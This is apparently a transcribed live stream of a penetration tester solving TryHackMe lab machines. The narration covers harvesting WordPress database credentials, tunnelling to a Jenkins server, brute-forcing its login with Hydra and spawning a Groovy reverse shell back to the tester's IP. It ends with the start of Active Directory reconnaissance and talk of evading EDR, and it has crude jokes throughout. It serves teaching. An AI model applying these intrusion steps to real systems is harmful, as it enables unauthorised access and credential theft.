say privesk. That's not what I'm looking for. Keep in mind, we've just compromised a WordPress server. Excellent. Zero Kieran. Always there, okay? Credentials, okay? Credentials, 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 credentials. The first thing you want is credentials. You want
a fine addition to my collection.
Valid credentials, okay? And where you're going to find it, 90% of the time, if you compromise a website through, if you're running as www data, the first thing you should think is, when you get a reverse shell, is what user am I running as, and where are they likely to have credentials? Where are the credentials likely to be? In this case, www data is the web server account. And web servers usually have databases. Databases require credentials. So the website is going to have credentials somewhere. For WordPress, that's right here in wp-config.php. Let's take a look-see. What do you know? Fine additions to our collection. So we have WordPress credentials here. So far, by the way, this is absolutely bog standard for how you would compromise a WordPress site in the real world. Absolutely. This is absolutely bog standard. Very realistic. We also notice that there's all these other WordPress things here, like auth key and secure auth key. If you know how to do it, it is possible to forge your own WordPress authentication tokens using these. So that even if they changed the admin password, if you had the key, you could forge your own authentication token for admin. Just as a fun fact there. So at this point, we're going to try and connect to... Is the reverse shell the shell of the server where the website is deployed? Yeah, okay, so when we talk about a reverse shell, we mean that we have triggered the website to make a connection back to us on an arbitrary port and spawn a command prompt. That's why it's called reverse, because the target is reaching out to us. Does that make sense? As opposed to a bind shell, which would we tell the server, open up a bind shell on a certain arbitrary port, and then we connect to it. That would be a normal shell. A reverse shell is where we stimulate a connection back to us. This is a finding as well? Absolutely. Remote code execution would be a finding. Credentials. I'm not sure if credentials in WP config would be a finding. They have to be there by design. So MySQL, we're going to connect to the database. TAC U, and the WordPress user is named WordPress. TAC P, WordPress 123. Now, what would be a finding is that these credentials are very weak. This is a very, very weak password. It's right up there. That's like a SolarWinds password right there. Oh, I did it wrong. That's not how MySQL wants its credentials. Get me out. Why won't it let me Control-C? Let's go tac p. We put WordPress 123 in there, and we're into the database, okay? We have penetrated the database, chat. Okay? Bustin' makes us feel good. Show databases. And we can see, so the information schema database is usually not interesting to us. Okay? Usually not interesting to us. This contains generally metadata about the rest of the database. We don't really care about that. What we care about is this WordPress database. Use WordPress. Show tables. And we see this WP users table. Now we can select star from WP users. Now, in a real database, you'd probably want to put in like limit 10 here because there's probably going to be a lot more users. But in this case, you don't really have to worry about that because we know there's only the one user based on WP scan. And we know their password. But if there were more passwords, we could take this and we could crack them with John the Ripper. In this case, not really necessary because, again, in this case, it's not terribly necessary just because, we already know what the admin's password is. Like this, thank you for the first time Prime indoctrination into the cult. Welcome to the All Has Red team. So there's probably nothing else in this database for us to look at. Let's look at the home directory, see what users there are. Aubriana. I do notice that we do not have the permissions, it appears, to view this directory. Yeah, we do not. Let's look at groups. Let's look at groups. We're just in www data group. We're just doing some basic enumeration about our user now. There's unlikely to be any credentials. Let's look at var www again. Make sure it was just... Let's look at the web server, see if there's any pages that we necessarily missed. This is just the default page, and then they have the WordPress blog. There doesn't seem like there's a whole lot in the WordPress blog other than those credentials we already found, so that seems to be a bust. Let's look for SUID binaries. See if we get any SUID binaries that are particularly interesting to us. Normal, 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 normal. All of these look normal. If one of them stuck out to us, we could use GTFO bins and look it up. But none of these stick out to me. So let's go ahead and do... let's go ahead and do linps. We're going to run a privilege escalation script to see if it finds anything for us. I don't think I have linps cloned yet. Yeah, I have to grab it really quickly. Linps GitHub. PwnKit is cheating? I'm not using PwnKit. It's not cheating if you get root. I'm going to blow your mind here. If you get root, it's not cheating. fhtagn. Did he change the name of this repo? I feel like it wasn't called that before. Yeah, we got WinPs and LinPs here, so this seems fine. We'll grab this. We could do sudo tac l. I don't typically expect www data to have sudo permissions. Okay, we got P's. Oh my god, I just want... Where is WinPs? Oh my god, I don't want to build it! Oh my god, what am I even doing? What is happening? Let me look at it. You gotta go to releases? Are you kidding me? Why? Alright, it wants me to do releases. Okay. Is it a fucking binary now? I just want the... Yeah. It's a fucking binary now, apparently. Why? Alright, I guess we'll just do the... We need to do AMD 64, not ARM 64. I know, I'd see the SH at the top, but if they want me to use... I'll try using the binary just to see. But I will complain about it the whole time. I reserve that right. Alright, so we'll host it. LinP's Darwin AMD 64. Which wget. Wget http ://10.2.54.81. Okay, we're pulling it down. Chmod plus X. See, this is why... Nope, I think that should, like... Did you check the /opt directory? Oh, I did not check the /opt directory. Let me run linp's, get that going. And then we can check /opt. Why do they do this to me? Okay. Wget it. Imagine that, it executes. Alright, there that is. You have nobody to blame with you but yourself? That is true. That is true. Let's do linps.sh and let's pipe it into linps.out and we'll put an ampersand to background it. No, stop. They're killing me here. Whatever. We'll check opt, and we'll just try and ignore what linps is doing. wpsave.txt. You know, it hasn't happened in a while. I'd almost stopped referring to /opt as the passwords directory. It feels... It felt like I went through a stint where... Like, on literally every machine, that's where the password... like, I'd spend, like, half an hour enumerating a machine and, like, carefully going through files to, like, to see what we had permissions for, and carefully going through linp's output, and so on and so forth. And then there'd just be a goddamn password in the opt directory. That happened... That seemed like we went through a stint where that was the case every single time. But it hasn't happened in a while, so my guard was down, chat. My guard is down. Always check /opt, okay? You never know what kind of stupid crap is in /opt, okay? We do have some credentials for Aubriana here.
A fine addition to my collection.
Okay, linp's finished. That's good. Sue Aubriana. And we will paste in the password, which is actually a strong password for the most part. And we are now Aubriana. Does everyone understand how we did that? I mean, we just found credentials and then switched. So, let's see what Aubriana has in her home directory. We do see that there is a user.txt. So we got that first. We've got the first user.txt. which indeed was one of our goals. So this is kind of a difference between red teams and penetration tests. Penetration tests usually are just, okay, here's my website. Find as many vulnerabilities as you can with it and help me improve the security. That's the typical penetration test. Or if it's an external penetration test, like scan our external infrastructure and find as many vulnerabilities as you can. What distinguishes a red team operation from a penetration test? And it's usually goals like this. Usually red teams will have get access to specific data. Like for Moderna, it was get access to information on the COVID vaccine, which was at that time still under development and was about to be distributed. Get access to the COVID vaccine. Get access to our proprietary mRNA data. For a red team, you're going to have specific goals like that. And in this case, that is what we have. We have the specific goal of getting these 2 flags. Quick question, is just one machine? I thought you needed to privest to DC or AD user. I'm only going by what it says here. Provided internal assessment of the provided virtual environment. I guess it's probably just one machine.
Red team LARPing.
Red team LARPing? I mean, all of red team is LARPing as a criminal, my dude. Thanks for the 14 months as well, year 0. Welcome back to the All Has Red team. All of red team is LARPing. That's all it ever is. There may be, I thought maybe we'd be in, like, there would be Docker containers or something like that. But there doesn't seem to be the case, at least not right now. If we get through this one quickly enough, which it looks like, based on the contents of this directory, I can say we probably will be done with this pretty quickly. And I'll explain why that is here in a second. We'll do another box, and maybe that box will have some spicier exploits for us. We do see this sudo is admin successful. What is this file mean, chat? What does sudo is admin successful mean? Don't they have simulations like phishing or malware implant exercise? They do, but a lot of times they bring in external teams to do it better and do it differently. Yeah, so it's likely she has sudo permissions or did at one point. So let's see if we have any sudo permissions. I see a couple of things that are interesting about this directory. Cannot run sudo. So what this means is she had sudo permissions at one time. This file was created then, and then her sudo credentials were removed for whatever reason. It was probably the box creator setting it up. Okay? Elevate Cyber, welcome to the stream. It's good to have you. What else do we see here that is likely very interesting to look at? Again, it's very important that we see, not only do we see with our eyes, but we observe. Okay? Jenkins. Jenkins.txt. What is Jenkins? My goodness. What have we here? What have we here, chat? So the box appears to have something listening on its localhost interface on port 8080. How interesting, chat. How interesting. And I would bet you, based on the presence of this file right here, that it is a Jenkins server. It's even telling us straight up. Is running on 172.17. See, this is interesting. I wonder if they had if this box originally had Docker. It does have Docker. This box has Docker installed. I guess that we probably can't run. Yeah, we get permission denied. She's not in the Docker group. So there is Docker. So this Jenkins container, Let's look at ifconfig. We can tell if there's a Docker interface or not. There is. There is a Docker interface. So it looks like Jenkins is running in a Docker container. And it's running at 172.17. Let's try curling that and make sure. Yep. So we do get something. So that is what we are listening on. So let's go ahead and go over here. Let's do this. Let's do SSH TAC L for local port forward. We're going to forward port 8080 on our Kali machine. Is it a different server? I doubt it's different. Let's curl localhost 8080. Okay, no, it's the same. So it's listening on the localhost interface as well as the Docker interface. So we can just do localhost. It doesn't really matter. Let's do this way. Okay. Brianna at internal.tryhackme. And if this doesn't log us in, we can always take her SSH key or put one in there. Oh, 8080 is already in use because of Burp. So we just want to use, let's use 8081. So we are actually doing a little bit of pivoting here. There is a web server that's listening on the local host on this, on internal, that we cannot reach externally. Like if we try to browse to... we get failed to connect. It's listening there, but it's listening on the localhost interface, the loopback. So we need to pivot through the target in order to reach it. Okay. So now if we look at netstat, we can now see that our Kali is now listening. Or this is the one. Our Kali is now listening on port 8081. And if we browse to not to internal.tryhackme, but localhost, we're browsing to our own Kali. And port 8081 is being sent through the SSH tunnel to Jenkins. Does everyone understand what happens there? This is a simple local port forward, but if you are confused, please do ask. So there is a web server that is listening. This Jenkins server is listening on the local host here. Okay? It's listening on the local host on internal. We can only reach it through internal. We cannot reach it without that. We need the tunnel because we cannot reach it through the otherwise. So let's do a quick paint stream. Okay, quick paint stream. And people are often confused. People are often quite confused about the port forwarding business, and with good reason, because it is confusing. Isn't it like Hack the Box where you're connected to the box itself? Or let me explain. So here we are. We'll say this is our Kali machine. And we'll say this is internal. Now, let's put up an arbitrary barrier here. I don't think there's actually a firewall in use, but we can sort of pretend there is for our own purposes to make this a little clearer. So there's a barrier between the two of us. And the only ports we found open, the chinks in this armor and the holes in this wall, one of them is SSH, and one of them is HTTP. Okay? So these are the ports we were able to connect to the box during. Does that we were able to use to connect to the box? Does that make sense? We can connect through SSH and we connect through HTTP. Does this make sense to everybody so far? Are Kali and Internal on the same network? No. Well, we're on the same network as in we're both on TryHackMe's network through the VPN. But for our purposes here, no. Okay? So Internal has another port open. There is another port open. And that's port 8080. Which is Jenkins. And we'll go ahead and draw some things here. So if we try to reach port 8080, we can't. Right? Because we get blocked. There's not really a firewall, okay? But this barrier is only for illustrative purposes. Does everyone make sense? We cannot reach port 8080 with Jenkins on it from our Kali. Yeah, the port is closed. It's only listening on the loopback interface. I'm not getting bogged down in details of. I'm trying not to get bogged down in details of what the difference between the firewall and just listening on the loopback interface is. The port is closed to us. We can't reach it. I'm explaining that, Cephid. I'm explaining that, Cephid Ian. I'm explaining that. That's what this is all for. What is port 8081 for? Good question, Votraz. Okay, good question. Okay, if you remember, we connected to it through port SSH. Let's look back at that SSH command that I used. This one right here. Damn it. There we go. So, this part of it specifically is what I want to call attention to. This tech capital L means I'm asking SSH, please establish a local port forward. The port forward is going to be from 8081 on my Kali to port 8080 on the loopback interface localhost of Internal. Does that make sense? So, we're connecting to the box through a port that it accepts. Make this red to make it clear. Like that. So we're connecting to the box through SSH. And we're saying, hey, SSH, open up port 8081. SSH local port forward. That's what that says. Open up port 8081 on Kali. And whenever we send a packet to port 8081, I want you to take that packet and send it through the SSH session and then send it to localhost port 8080 on the internal network. Is this common in real life? It's extremely common. If you ever pen test internal networks, it's very common to have to do this. This is super, super common. This is why I go into such painstaking detail trying to explain it every time. Because A, I know it's confusing. And B, it is a crucial to understand skill. So, We are reaching port 8080 through port 22. We're coming through SSH, and SSH is... we're using the SSH session to reach port 80. Does that make sense? SSH is configured to accept requests on 8081 on our Kali machine, which is why here we're browsing to localhost 8081. And every time it receives a connection with port 8081, it's just going to send that through the SSH tunnel and then send it to Jenkins on port 8080, which is where we want it to go. You could have done port... This 8081 is arbitrary. You could use any port. The only reason I'm not using 8080 is because Burp is listening on port 8080. It's in use. Does this make sense? It's less noise? Yes. It is sneakier. Because instead of your Kali making connections to the target, all we're seeing is normal... All that can be seen from internal's perspective is just connections from itself to port 8080. Then how does 8080 internal knows how to respond? The SSH knows how to handle that. It accepts the response from port 8080 and sends it back through the SSH session, and it sends it to us. SSH takes care of that. Does that make sense? Is everyone following what's happening here? Will Ricardo Soares, I think that's how you pronounce it. Welcome to the All Has Red team. Thanks for the prime, my dude. So that's why we can now reach Jenkins. I know this is confusing. Port forwarding is always confusing, but this is crucial to understand if you want to get into penetration testing. There are also other tools you could have used, like SSH shuttle. That would work as well. I'm just trying to keep it as simple as possible. Okay, so we can now reach Jenkins. So the question is, here we go. I'm gonna use my super hacker skills to break Jenkins. Ready? Are you guys ready? This is why you're here. This login prompt can't stop us, okay? I'm gonna use my super secret password. Damn it. That worked one time to say I just know it, dude. I know how to get past it, and then it's never worked again. And then it's just never worked again. So we could just try some basic stuff here. Admin, password. Jenkins doesn't have default credentials to my knowledge. I think Jenkins requires you to choose a password when you set it up. I'm pretty sure. Yeah, we could try Jenkins123. Admin. Jenkins123 is a good one to try because of the WordPress password earlier. Admin123. We're just trying... It's always good to try all these basic passwords. Password123. Let's just go ahead and Hydra this. It's not intercepting, is it? Oh, it's disregarding localhost. Back to settings. Network settings. Connections to localhost are never proxied. Damn it. How can I force... Is there a way to force it to proxy? Is there a way to force it? Is there a way to force it to proxy my requests to localhost? Oh, that's a good idea. We could check to see. If we can find the CD Jenkins. Oh no, Jenkins is running in a Docker container. We're not going to see that, Angel D, because Jenkins is running in a Docker container. So it's in its own isolated environment. Maybe change the etc host file. I mean, I guess we could, but... How do I get Firefox? I swear I've had this happen before where I can intercept to localhost. I guess we can just try changing the localhost file. Vim. Let's just add localhost to localhost 2. We'll just call it localhost 2. Let's do that, and let's try to browse to localhost 2 and see if that gets proxied. Let's clear all of these. Okay, it does get proxied. It really was that simple, huh? Okay, it was that simple. Good call. All right, admin. Admin, let's capture a post request. All right, here's the post request. Send this to repeater so I can look at it. And this is what we want right here. So that we can go over to Hydra. Attack L admin. Attack P user, share, word lists, rocku.txt. And now I have to remember the Hydra syntax. Hydra syntax gets really annoying with HTTP post requests, so we're just going to Google it. Hydra HTTP post form. I always forget how to do Hydra with an HTTP post form. It's not exactly an easy syntax to remember. Looks like it wants internal dot, or no, it's going to be localhost. Localhost 2 8081. And then it's going to be HTTP post form. And now it wants like a long string. First thing it wants is the endpoint, if I remember correctly. It wants what's it sending a post request to. Then it wants a, is it a colon? I can't believe you had to Google that. Dude, I can never remember Hydra syntax. Hydra syntax is, if anyone can remember, it's harder to remember than fucking tar commands, I swear to God. Okay, here it is. Index.php, this is what we want. And then it wants a colon, then the post data, and then it wants some indication of what a bad login is. So, now it wants the post data, which is this. And the way you do this is you put in a caret user caret that tells Hydra, hey, put the username that we picked in here. We could have easily just put admin in there, but I'm just doing this for illustrative purposes. And then we have to use caret pass caret. So Hydra knows to put in the password there. And then after the post data, we need oh fuck. We need another colon. And what text do we get on the page for a bad login? We get a 302 found. Invalid username, I guess. Like that. Hopefully that works. Let's see. Did I just get it right in the first try? Could not resolve address localhost 2 8081. Does it want HTTP? I think it might want http://. Damn it. Okay, it doesn't want that. Honestly, we don't even need localhost 2. We can just do localhost. We only needed localhost 2 to capture the request in Burp. Maybe it wants the IP address instead of the... Again, Hydra syntax is annoying. This is just the way of things. Use auto recon. Maybe it needs to be... Maybe I need to set the port. a different way. Is it... What do you do to set the port? Because P is password. What's port? TAC S. It's TAC S. I guess it doesn't like putting the port right here. Instead, it wants TAC S 8081. There we go. Now it's working. Okay, so it doesn't like the colon with the port. There. You can brute using Burp Intruder. It's more easier. It is easier, but I don't have Burp Suite Pro on this Kali edition. I only use Burp Suite Community on stream. I have a subscription to Burp Suite Pro in real life, but I only use it for work. I don't use Burp Suite Pro on stream because that's not really helpful to people who don't have a Burp Suite Pro license. So let's see if we're now brute forcing this login, and we'll see if we get access here. 33879. Was there a port 33879? I just didn't see that because I was focused on Jenkins. There is one. Let's find out what's happening there. 37649. Page not found. This is a web page as well. Well, let's see if there's any indication of what that might be. Doesn't seem to point to what service might be running there. We might just have to enumerate it. So let's go ahead and start another local port forward. We can do that without exiting the SSH session with ~C. TAC L for local port forward. And we'll 37649. Localhost 37649. Okay. So now we have another local port forward happening here. Okay, never mind. It got it. But if we go netstat, let's just copy this. So we did crack the password. Very strong password. SpongeBob. We are feeling... Are we feeling it now, Mr. Krabs? Are you feeling it now, chat? We can now see that we have 37649 listening as well. So we can try to browse to that. And we get 404 page not found. So we could try and go buster that as well. And this is just good practice to do this. Have automated recon going in the background while we do other things. HTTP response to HTTPS client. Oh, I have HTTPS. There we go. So we can let that run while we come back over here to SSH. We come back over here to Jenkins, more accurately. And we go admin, SpongeBob. And we are logged into Jenkins. Does anybody have any questions about any of that we just did right there? Any questions there, chat? Jenkins stores credentials in credentials.xml. Yeah. Well, once we get code execution. So what are we doing now? So what is Jenkins, first of all? What is Jenkins? Jenkins is, it's sort of a dev pipeline tool. It's used for automating your DevOps, essentially. You'll find it a lot in developer environments, because it helps them build their applications in an automated sense, and so on and so forth. What we care about with Jenkins is the fact that there's a script console. So if we go /script, we find a script console here, and we just absolutely love script consoles, my dude. Okay? If you get access to a Jenkins and you can a Jenkins instance and you can access the script console, you should already be at least half erect. Perhaps even full mast. Okay? Some blood should flow into your penis. Okay? Or your vag, whichever is more appropriate for you. Like, you should get excited. Awesome meeting, cheers made. I'll message you on LinkedIn once I'm connected. Hey, it's great. I'm glad you liked it here, Nano Cybersex. Good to have you here. Because we can execute arbitrary Groovy here. What is Groovy? Groovy is like a scripting language for Java. Okay? It's like a Java scripting language. So there are reverse shell one-liners for Groovy. Is it in here? Or do I have to go to payloads, all the things? I think I might have to go to payloads, all the things. Yeah. So let's go to payloads, all the things. Okay. And we want Groovy. Paste that in there. 10.2.54.81 is our IP address. We'll make it port 8444. We want to make sure we don't execute cmd.exe. We want to execute bin bash. All right, let's do bin sh. A little bit more luck with that. Okay. We can run that. And looky there. Any questions, chat? How do you show your findings to your client with an erection? Well, ideally you don't have the erection on camera. I don't know if you've ever been on a video call ever in your life, but it's kind of unusual to have the part of your body below the waist in the camera frame. It'd be a little bit awkward. Have a good day, Nano Cybersec, or night, or whatever time it is, wherever you are. Thanks for being here. Oh, let's do Stream Raiders. Let's do Stream Raiders before we continue. If you're a coward. If you want to keep your job, I recommend that you be a little bit cowardly in that regard anyway. How'd we get the creds? I walked away. We cracked them with Hydra. We brute forced it with Hydra. If you have a long penis, it might show up in the webcam. That's true. Sometimes you just can't restrain it. Sometimes you really just can't restrain it. It gets away from you a little bit. Have I been using Teams wrong? If you've been showing your dick on Teams, my guess is yes, you have been using Teams wrong. Is there any chance to find an internal server in Jenkins like the previous one? Absolutely. This box is simulating like you pop the web server, right? You get you get access to the web server, and then you pivot to the internal network where there's a Jenkins server running. That's what this box is simulating. It's just running in a Docker container because there's limited ability to have a wider network in this situation on TryHackMe. Okay, back to it. So we are inside of a Docker container. What does that mean? Very likely. Let's just verify we're in a Docker container first of all. We are. So this .docker.env file is basically a dead giveaway. If you see that in the root directory, you're almost certainly in a Docker container. What is a Docker container? You can think of Docker containers like little miniature virtual machines. They're not really the same thing. There's a distinction. But Docker containers are little isolated environments and isolated file systems. We are not on internal here. We are not on the same machine that this is. This is on the actual host. This is on a Docker container that's running on internal. Like, we're still technically on internal, as in internal is executing our commands. But we're in a different file system entirely. Okay? It's basically it's basically a hardware abstraction, is basically what it is. So we're inside of a little isolated environment. We want to break out of this environment and hopefully use our permissions to get root somehow on the actual host. So the first thing we're going to do is find out if Python is installed. My guess is it is not. Oh my god, it is. We have Python 2, but not Python 3 for some reason. So what's happening here is, what you have to realize about Docker containers are, again, a Docker container is usually just running one application, okay? And it's only going to have the exact things that are necessary to run that application, okay? It's not going, this is running Jenkins, so I would expect it to have Java and stuff, but not Python. It's very common to get into Docker containers and find that they don't have Python installed, which is a little frustrating. But because you can't spawn a PTY. Okay. Okay, Control Z. Raw minus echo. Export term equals X term 256 color. STTY-A. Rows 42, columns 142. Just getting our stuff set up the way that I want it to be. All right. So, at this point, we want to look for ways to break out of this Docker container. So let's see if we have sudo permissions. We don't even have sudo, like the command sudo. We have nothing in home. Cat etc passwd. We have var Jenkins home. That might be something to look for credentials. Let's look at opt. Okay. All right. Note.txt. So the thing with this box seems to be just check /opt, and there's just a goddamn password in it. So it's usually not that easy. We will do another box after this, by the way. We're not done for the day. We will do another box. It's usually not that easy, but I'll take it. I'm not going to complain. Let's go back to su root. Now, if this might be the root user inside of the Docker container. If so, we're not done yet. Nope, this is just root on the host. And there we go. Docker Destroyer. We did it, chat. Does anybody have any questions about that box? We will do another box. We will do another box. We are not done. We're going to do a poll for another box. 3 hours for a medium box? It wasn't 3 hours. Are you kidding me? This was less than, this is like an hour and a half. Tops. We went from the host to the container, or is there another host hosting the container? No, there's only one host. Internal is the only host. Docker is running on here, and you can tell that with, if we run, we can, as root, we can run Docker commands. We can run Docker PS, and we see that the Jenkins image is running. See that? So this host, the internal, is running Docker. And Jenkins is running in that little Docker isolated environment. So that was a little bit weak. I was expecting to have to run deep CE and mount to see if there were any file systems that were mounted inside of the container and stuff like that. That would have been a little bit more interesting. Let's just pick a new box, okay? Was short AFK, how did you get root? Well, we got code execution on Jenkins using the script console. We were inside Jenkins' Docker container and we found credentials for root, the root user inside of the ops directory in the Docker container. All right, if you got questions, let's go ahead and ask. I'm going to go ahead and exit out of all of this. All right. Let's pick another box. Where is my TryHackMe? I didn't close it, did I? I think I closed it. Why did I close it? I have so many damn tabs open. We are now allowed to use F12? Are we really? Pog. Wait a minute. Web scraping is legal. Mike Parsons can't keep us down anymore, chat. Mike Parsons can't keep us down anymore. We're safe. We are safe hitting F12. F12 now in scope, indeed, yeah. All right, we're going to pick a new box. I got to log back in to TryHackMe again. Give me just a second. So I saw some requests for, oh my god, I forget that CAPTCHA every single time. Alrighty, there we go. Okay. So I saw people asking for Enterprise. So we'll put in poll. Alright. Enterprise with a Z, which is a Linux machine. Enterprise with an S, which is a Windows AD machine. Raw, Windows AD. You know, we could just do... Yeah, we'll do... Raw is fine. And then there's... Let's look to see if there are other ones that are interesting. This one has Hydra in it. I don't want to keep brute forcing. We had to brute force twice for this one. That's not terribly interesting. I think we did Ultratech recently. Let's get some more Linux machines. I have 2 Windows machines listed already. I'm 99% sure you've done Enterprise. I definitely have, but I don't remember. If I don't, it doesn't, just because I've already done it doesn't mean no one's going to learn from it if I do it. And if I don't remember it, you're still getting the real experience. I do so many of these damn things that I can't remember any of them now. We'll put in Watcher as well. There you go. Get your votes in. Get your votes in, chat. I haven't seen many Windows ones. There are Windows boxes, but they're less than Linux because of licensing issues. Which is a shame because I'm better at Windows boxes. Fit deck. We have a fit deck redemption. Where is my fit deck? Is it over here? There it is. We do stay active on this stream. Oh my god. You guys are getting the fire hydrants today. 16 on each leg. Yes, eat your heart out, chat. Oh, boy. He rigs the deck? He absolutely does not rig the deck. The deck chooses what it wants us to do, okay? Alright, it looks like we have Enterprise, the Windows Active Directory machine. Which is good because Active Directory is my strong suit. Alrighty. What version of Bloodhound is Sharphound? Oh, God. Don't even get me started on that, dude. Bloodhound decided to update their shit in the middle of my last assessment. And every time Bloodhound updates, like, their shit is not compatible, backwards compatible fucking ever. So it was a pain in the ass trying to get Sharphound to run on the target and then load it and then get it into yeah, exactly. But if you're using Bloodhound 4, which is the newest version, you have to use Sharphound from Sharphound 4. Like, the old Sharphounds will not work for it. I hate that. It's one of my big frustrations with Bloodhound. Okay. Okay. We're in a new, fresh TMUX session with the Enterprise machine. All my imports were throwing errors. That'll happen. Yep, you got to make sure you're using a version of Bloodhound that's compatible with the ingester that you run. And it's a pain. So what can we expect while this machine is booting up? What can we expect from this? So this is a Windows machine, and not only Windows, this is an Active Directory machine. So what kind of box do we expect this is likely to be? It doesn't necessarily need to be an Active Directory machine, but what kind of box do we expect this is likely to be? Just out of curiosity, have you done any EDR evasion stuff? I have, quite a bit, actually. We once rewrote an Empire module to get past antivirus, and I've released an entire video on my Patreon that's specifically focused on AV EDR evasion. Yeah, we can expect it's likely a domain controller. We can expect it's very likely to be a domain controller. And we can. I'll show you how to be able to tell. You can always tell from the ports open, or at least usually tell from the ports that are open. So let me go ahead and change the current challenge. We're gonna give it a few minutes to warm up. Windows boxes usually take a little longer than Linux to start up, and especially domain controllers will take a second. So let's just be patient. Cephadine, thank you so much, my dude. I'm glad that you are enjoying the vibes of the stream. Really glad. I'm genuinely glad. I hope you'll come back and check us out. I stream 3 times a week. Someone was asking what song this is. This is the Valkyrie theme from God of War. We often do lots of gaming stuff on this channel because I'm a gamer. Yeah, Maticus Maximus in chat had a bad experience with this song. Most of us who have played... If you've played Give Me God of War mode, or at least even hard mode on that game, you've had a bad experience with this song. Involving this song, anyway, I should say. Do you keep your old VODs somewhere? I do. I'm uploading them to YouTube. After I stream, my VODs are stored to my Twitch. So you can watch my old VODs going back 2 months, all on my Twitch. And I upload all the old VODs to YouTube. Getting farmed by the Valkyrie. Oh my god, Sigrun. Give me God of War Sigrun. Gave me the fucking business for probably 3 hours. Like, it's fucking hard. It's fucking hard. That's all I'm gonna say about that. Alright, let's go ahead and scan this thing. Now, raise your hand in chat. Raise your hand in chat if you are scared of Windows. Don't be shy. Don't be shy. Are you scared of Windows? It's very common, especially for new pen testers, to be afraid of Windows for some reason. There's no reason to be afraid of Windows. Are you afraid of Windows Defender? Be honest. Who's afraid of Windows Defender? It's okay. It's okay. As far as signature-based antivirus goes, Windows Defender is quite good. And I mean that earnestly. Windows Defender is very good as far as signature-based AV is concerned. Don't be concerned, though. Daddy Al has you. Okay? I got you. I got you. I'm gonna take you by the hand and lead you down deep into the slimed halls of Rillia, okay? And we're gonna go see the Dark Lord Cthulhu together, okay? What is your opinion on using Kaspersky? I know when I worked for the NSA that we didn't trust it. We joked about Kaspersky quite a bit, actually. We did not trust Kaspersky. Derncatcher, Dino Risk, David Geekly, Blue Saibi, Danny Skull, William HX, Chronox, Look Magic, and David Roz, and Allison, Zorbads, and Anonymy 314. Thank you all for the follows. Cthulhu Fountain to all of you. No one is using Russian products anymore? That's true. The funniest thing that I had happen with Kaspersky recently... Oh my god, we already Nmap scanned and I forgot. The funniest thing I had happen with Kaspersky recently is... and Helen of Tor, if she's in chat, will attest to this. We went to go see Moonfall, that really shitty movie Moonfall. That came out like semi-recently, like a couple of months back. And Kaspersky advertising, for whatever reason. This is a movie about the moon randomly leaving its orbit and trying to crash into the Earth. And for some reason, Kaspersky was all over this movie. Like, at one point, the main characters go up to the International Space Station, like in a fucking space shuttle, and like dock with the International Space Station, and then a guy has to get out and like manually dock it. And like when he interacts with the panel on the outside of the International Space Station, it says "Protected by Kaspersky." I'm not kidding. This actually happened. This International Space Station apparently is protected by Kaspersky antivirus. In this movie, and like there's multiple moments like where you see but every time you see a computer screen in this movie at all, Kaspersky's logo is on it. I swear to God. Like, take a drink every time you see Kaspersky's logo in this movie. And there's one time where it, like, the camera, like, fixates on a Kaspersky billboard just out of nowhere. There's, like, a scene transition into a new scene, and all you see is a Kaspersky billboard, and then it zooms out to characters walking in front of it. Like, it was so... the product placement was so hilarious in that movie. I would say it was so cringe, it actually looped back around again and became uncringe. It became funny. Alright, so we're seeing a lot of ports open here. Look at this. We see a lot of ports open. Don't be afraid. Don't be afraid. Some ones to note. If signature AVs are a joke to you, what scares you? Signature AVs are a joke. To anybody who is... To a red teamer, signature-based AV is super easy to bypass. What scares me is Windows Defender ATP, also known as Microsoft Defender for Endpoint. It's called Microsoft Defender for Endpoint now, but it's a souped-up version of Windows Defender that's for enterprises. It's endpoint protection for enterprises, and that shit's super robust. Are there ways to get past it? Sure. I have to deal with it fairly frequently, so I do have ways to get past it. But it is a pain in the ass. Carbon Black is also a pain in the ass. CrowdStrike Falcon is also a pain in the ass. Those are the S-tier ADRs, or EDRs in my opinion. You've got your Windows Defender Windows Defender for Endpoint, Carbon Black, and CrowdStrike Falcon. Those are the highest tier. In tier B, I would in B tier or in B tier I'd probably put Cyber Reason is not bad. Its sandbox is a little annoying, but it's not too bad. You got Cyber Reason. You've got Arctic Wolf is garbage. McAfee is garbage. Symantec is garbage. All of those are garbage. I'm not doing a tier list now. I haven't... Cisco Endpoint. I've never experienced Cisco Endpoint. I've experienced Cisco border stuff, like Cisco Umbrella, which is a little annoying, but not like the end of the world. So what are some things to note? We have a lot of ports open, but this is very, very common. Did you already shit on Malwarebytes? Oh, I even forgot Malwarebytes was even EDR. If you have Malwarebytes installed on your computer, you should not have Malwarebytes installed on your computer. Malwarebytes is itself malware that is harvesting your data. And you can tell because it's free. If something is free, you are not the customer, you are the product. Malwarebytes... I have literally never had any of my malware caught by Malwarebytes. Not a single time. Sophos is garbage. Not good. So, some ones to note. Port 88. What's Port 88? Bitdefender is good. Norton, I would say... it's consumer grade. I'd put it in C tier. What about that trial version? Garbage. So this is Kerberos. Port 88 is Kerberos. Port 88 is and if you see this port open, 90% of the time you're dealing with a domain controller. Almost always, domain controllers are the machines that act as the key distribution centers for Kerberos. So if you see port 88 open, it's almost always a domain controller. If I don't know where the domain controllers are on a network, I often will Nmap scan just for port 88 because I know that that port will be open. How good is Windows Defender? As far as signature-based AV goes, it's quite good. It's one of the best signature-based AVs out there, mostly owing to AMSI and its general full integration into Windows. Like, it used to be back in the day that you could use PowerShell to completely bypass Windows Defender. Like, you weren't dropping any files on disk with PowerShell, so you would do all of your ops in PowerShell, and it would completely bypass Windows Defender. No longer the case. AMSI now exists to scan PowerShell scripts. Then it became the case that now we're using C# scripts and loading the .NET framework and loading C# scripts into memory. But now as of .NET 4.8, .NET is also AMSI aware. So so Windows Defender, if it's running on a host, is basically always in your way. And that's the key with antivirus, is to make sure it's always in the attacker's way. That's how you make it annoying. We also see 3389. What is 3389? What's port 3389, chat? Don't say Microsoft Terminal Services. What it actually is. Remote desktop. Yeah, it's remote desktop. So if we get credentials, we can remote desktop in here. 445 is what you always see for Windows. What's 389? 389 and 636. What are those?
Was there ever a time a company didn't have the budget for a costly EDR AV solution and had
Yeah.
to only use free solutions or hardened Windows Defender that you have tested?
